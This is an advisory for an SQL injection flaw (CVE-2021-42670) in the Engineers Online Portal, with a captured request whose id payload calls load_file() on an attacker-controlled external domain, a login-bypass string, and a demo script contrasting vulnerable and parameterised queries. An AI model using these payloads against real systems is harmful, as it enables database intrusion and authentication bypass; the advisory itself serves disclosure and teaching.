CVE-nu11-101321
CVE-2021-42670
Vendor
Description:
The id parameter of my_classmates.php in the Engineers Online Portal 1.0 application appears to be vulnerable to three types of SQL injection: boolean-based blind, error-based, and UNION query. The payload '+(select load_file('\\\\hh2s4z961nps5mtx8px8zoud248ywq0erhf82yqn.nu11secur1tyexploit.net\\ggc'))+' was submitted in the id parameter. It injects a subquery that calls MySQL's load_file() with a UNC path (MySQL unescapes the doubled backslashes to \\hh2s4z961nps5mtx8px8zoud248ywq0erhf82yqn.nu11secur1tyexploit.net\ggc) whose hostname sits on an external, attacker-controlled domain. The application resolved that domain, which shows that the injected subquery was executed (out-of-band detection). The DNS interaction only proves execution, not that any file content was read: load_file() additionally requires the FILE privilege and is constrained by secure_file_priv, and UNC path resolution depends on the database host being Windows, which the Apache/Win64 response headers below suggest. The login form is also vulnerable to authentication bypass through SQL injection in the username parameter. The request below was captured against an instance deployed under /nia_munoz_monitoring_system/.
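To make the capture concrete, the following script (an added example, not code from this advisory or from the Engineers Online Portal project) decodes the captured request line into the SQL text the server would see, recovers the UNC path that MySQL's load_file() would try to open, and then contrasts a string-concatenated login query with a parameterised one to show how the username bypass works and how the fix stops it. It uses sqlite3 as an offline stand-in for MySQL; the students and users table names, the query shapes, the admin credential and the bypass string are assumptions, since the advisory does not include the application source.

```python
import re
import sqlite3
from urllib.parse import parse_qs, urlsplit

# Constructed from the GET line shown in the advisory's captured request.
CAPTURED_REQUEST_LINE = (
    "GET /nia_munoz_monitoring_system/my_classmates.php?id=191'%2b(select%20"
    "load_file('%5c%5c%5c%5chh2s4z961nps5mtx8px8zoud248ywq0erhf82yqn."
    "nu11secur1tyexploit.net%5c%5cggc'))%2b' HTTP/1.1"
)

# Assumed bypass string: closes the quoted literal, then comments out the rest.
BYPASS_USERNAME = "admin' -- "


def id_param(request_line):
    """Return the percent-decoded value of the id query parameter."""
    _method, target, _version = request_line.split(" ", 2)
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    return params["id"][0]


def effective_query(id_value):
    """Assumed shape of the vulnerable query (the advisory does not show the PHP):
    the raw parameter is spliced into a quoted literal, so the payload's leading
    quote closes the literal and its trailing +' reopens it, keeping syntax valid."""
    return f"SELECT * FROM students WHERE id = '{id_value}'"


def unc_target(id_value):
    """Extract the load_file() argument and apply MySQL's string unescaping
    (only the doubled-backslash rule, which is all this payload relies on)."""
    m = re.search(r"load_file\('(.*?)'\)", id_value)
    if not m:
        return None
    return m.group(1).replace("\\\\", "\\")


def demo_users_db():
    """In-memory stand-in for the portal's users table (assumed schema; the
    plaintext password is only to keep the demo short, never store them so)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct horse battery staple')")
    conn.commit()
    return conn


def login_concat(conn, username, password):
    """Vulnerable pattern: untrusted input is concatenated into the SQL text,
    so a quote in the username changes the query's structure."""
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return conn.execute(sql).fetchone()


def login_param(conn, username, password):
    """Fixed pattern: bound parameters keep the input out of the SQL grammar
    (mysqli and PDO prepared statements use ? placeholders the same way)."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()


if __name__ == "__main__":
    payload = id_param(CAPTURED_REQUEST_LINE)
    print("decoded id :", payload)
    print("SQL seen   :", effective_query(payload))
    print("UNC target :", unc_target(payload))
    db = demo_users_db()
    print("concat login with bypass:", login_concat(db, BYPASS_USERNAME, "wrong"))
    print("param  login with bypass:", login_param(db, BYPASS_USERNAME, "wrong"))
```

Run as a script to see the decoded query; the concatenated login returns the admin row for the bypass string because the comment marker discards the password check, while the parameterised login returns no row because the quote and the comment marker are passed as data. sqlite3 has no load_file(), so the decoded id payload is only rendered here, not executed.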
Request:
GET /nia_munoz_monitoring_system/my_classmates.php?id=191'%2b(select%20load_file('%5c%5c%5c%5chh2s4z961nps5mtx8px8zoud248ywq0erhf82yqn.nu11secur1tyexploit.net%5c%5cggc'))%2b' HTTP/1.1
Host: 192.168.1.180
Cookie: PHPSESSID=5ndeh840im8k21e9mtnu57gp11
Upgrade-Insecure-Requests: 1
Referer: http://192.168.1.180/nia_munoz_monitoring_system/dashboard_student.php
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close
Cache-Control: max-age=0

Response:
HTTP/1.1 200 OK
Date: Wed, 13 Oct 2021 07:15:40 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10632
<!DOCTYPE html>
<html class="no-js">
<head>
<title>NIA Project Monitoring System</title>
<meta name="description" content="Learning Management System">
<meta name="keywords" conte
...[SNIP]...

Reproduce:
Proof:
NOTE:
- The PoCs will be encrypted, sorry about this, dear friends!
- If someone wants to see this work, please write me!
- KR @nu11secur1ty
